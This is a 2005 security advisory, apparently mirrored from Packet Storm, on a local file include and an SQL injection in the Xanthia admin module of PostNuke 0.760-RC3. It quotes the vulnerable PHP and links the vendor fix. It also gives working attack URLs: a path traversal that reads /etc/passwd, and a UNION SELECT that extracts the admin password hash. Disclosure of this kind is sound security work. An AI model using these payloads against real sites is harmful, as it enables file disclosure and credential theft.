Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

postnukeSQL0760rc3.txt

🗓️ 14 Aug 2005 00:00:00Reported by Maksymilian ArciemowiczType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 51 Views

PostNuke Phoenix Release 0.760-RC3 SQL Injection and File Include Vulnerabilitie

Code
`  
  
-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
[PostNuke Non Critical SQL Injection and Include 0.760-RC3=>x cXIb8O3.10]  
  
Author: cXIb8O3(Maksymilian Arciemowicz)  
Date: 2.4.2005  
from securityreason.com TEAM  
  
- --- 0.Description ---  
  
PostNuke: The Phoenix Release (0.760-RC3=>X)  
  
PostNuke is an open source, open developement content management system  
(CMS). PostNuke started as a fork from PHPNuke (http://www.phpnuke.org) and  
provides many enhancements and improvements over the PHP-Nuke system. PostNuke  
is still undergoing development but a large number of core functions are now  
stabilising and a complete API for third-party developers is now in place.  
If you would like to help develop this software, please visit our homepage  
at http://noc.postnuke.com/  
You can also visit us on our IRC Server irc.postnuke.com channel  
#postnuke-support  
#postnuke-chat  
#postnuke  
Or at the Community Forums located at:  
http://forums.postnuke.com/  
  
  
- --- 1. Non Critical Local files include ---  
This error exist in modules/Xanthia/pnadminapi.php. You can read all files in server if the PHP is bad configured and if you have admin right.  
  
For exemple:  
  
http://[HOST]/[DIR]/index.php?module=Xanthia&type=admin&func=addTheme&authid=&skin=cXIb8O3  
etc.  
  
Error message :  
- ---------------  
/www/PostNuke-0.750/source/html/modules/Xanthia/pnadminapi.php on line 1053  
- ---------------  
  
or  
  
http://[HOST]/[DIR]/index.php?module=Xanthia&type=admin&func=credits&skin=[FILE]  
  
but you can give to varible skin path to other file. Exemple for /etc/passwd  
  
http://[HOST]/[DIR]/source/html/index.php?module=Xanthia&type=admin&func=addTheme&authid=&skin=../../../../../../../../etc/passwd%00  
  
  
Vulnerability code in modules/Xanthia/pnadminapi.php:  
  
- ---1039-1052---  
$cWhereIsPerso = WHERE_IS_PERSO;  
if (!(empty($cWhereIsPerso))) {  
$xaninitlang_path = $cWhereIsPerso . 'themes/'.$id.'/lang/'.$langs.'/xaninit.php';  
$xaninit_path = $cWhereIsPerso . 'themes/'.$id.'/xaninit.php';  
}  
else {  
$xaninitlang_path = 'themes/'.$id.'/lang/'.$langs.'/xaninit.php';  
$xaninit_path = 'themes/'.$id.'/xaninit.php';  
}  
if (file_exists($xaninitlang_path)) {  
include_once($xaninitlang_path);  
}  
  
include_once($xaninit_path);  
- ---1039-1052---  
etc.  
  
- --- 2. Non critical Sql Injection ---  
This sql injection is non critical because it works only with admin rights.  
  
- -1655-1676---  
$sql="SELECT $column[module] as module,   
$column[block] as block,   
$column[position] as position   
FROM $pntable[theme_blcontrol]  
WHERE $column[position]='$dati[0]'   
ORDER BY $column[module]";  
  
$result =& $dbconn->Execute($sql);  
if(!$result->EOF) {  
// Create output object - this object will store all of our output so that  
// we can return it easily when required  
$pnRender =& new pnRender('Xanthia');  
  
// As Admin output changes often, we do not want caching.  
$pnRender->caching = false;  
  
$pnRender->assign('menu', pnModFunc('Xanthia','admin','thememenu'));   
$pnRender->assign('warn', _XA_NZWARNING);  
$pnRender->assign('columnheaders', array(pnVarPrepForDisplay(_XA_MODULE),  
pnVarPrepForDisplay(_XA_BLOCK)));  
while(!$result->EOF) {  
$row = $result->GetRowAssoc(false);  
- -1655-1676---  
  
So if we want to make successful attack we need first log_in as postnuke administrator.  
When we are administrator we can go to :  
  
Example:  
  
http://[HOST]/[DIR]/index.php?module=Xanthia&type=admin&func=rimuovinuovezone&skinID=8&riga[0]='cXIb8O3&riga[1]=and&riga[2]=sp3x&skin=PiterpanV2  
  
Error message :  
- ---------------  
Fatal error: Call to a member function GetRowAssoc() on a non-object in /www/PostNuke-0.750/html/modules/Xanthia/pnadmin.php on line 1676  
- ---------------  
  
Exploit for admin:  
http://[HOST]/[DIR]/index.php?module=Xanthia&type=admin&func=rimuovinuovezone&skinID=1&riga[0]='%20UNION%20SELECT%20pn_uname,pn_pass,pn_pass%20FROM%20pn__users%20WHERE%20pn_uid=2/*  
  
- --- 3. How to fix ---  
PNSA 2005-2  
Security Fix (changed files only) for PostNuke 0.750 (tar.gz format)  
http://news.postnuke.com/Downloads-index-req-viewdownloaddetails-lid-471.html  
SHA1: 6e76d92124c833618d02dfdb87d699374120967d  
MD5: a007e741be11389a986b1d8928a6c0e5  
Size: 160550 Bytes  
  
or CVS  
  
- --- 4. Greets ---  
  
sp3x  
  
- --- 5.Contact ---  
Author: Maksymilian Arciemowicz < cXIb8O3 >  
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com  
GPG-KEY: securityreason.com TEAM  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.2.6 (FreeBSD)  
  
iD8DBQFCju1CznmvyJCR4zQRAp43AJ4q5/3+dxSvWStOt3r839UGAqZwmQCfUeX9  
FPuUJYFwC8xSOTg8ws0eSWY=  
=pg2k  
-----END PGP SIGNATURE-----  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
14 Aug 2005 00:00Current
postnukephoenix release0.760-rc3sql injectionfile includexanthiaadminsecurityvulnerabilities
51